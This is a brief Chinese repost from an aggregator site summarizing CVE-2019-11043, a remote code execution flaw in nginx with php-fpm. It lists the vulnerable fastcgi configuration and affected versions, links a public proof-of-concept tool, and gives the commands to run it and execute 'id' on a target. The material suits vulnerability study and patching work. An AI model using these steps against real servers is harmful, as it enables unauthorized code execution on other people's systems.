应用安全 - 编程语言漏洞 - PHP语言漏洞汇总
Posted atesetenginner
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了应用安全 - 编程语言漏洞 - PHP语言漏洞汇总相关的知识,希望对你有一定的参考价值。
CVE-2019-11043
Date: 2019.9.16 类型: 远程代码执行 前置条件:
nginx + fastcgi + php-fpm
配置文件信息如下: location ~ [^/].php(/|$) { ... fastcgi_split_path_info ^(.+?.php)(/.*)$; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass php:9000; ... } 影响范围:
version>php 7, php5(EXP暂无)
PoC:
https://github.com/neex/phuip-fpizdam
go run . "http://ip:8080/index.php"
ExP:
http://ip:8080/index.php?a=id
以上是关于应用安全 - 编程语言漏洞 - PHP语言漏洞汇总的主要内容,如果未能解决你的问题,请参考以下文章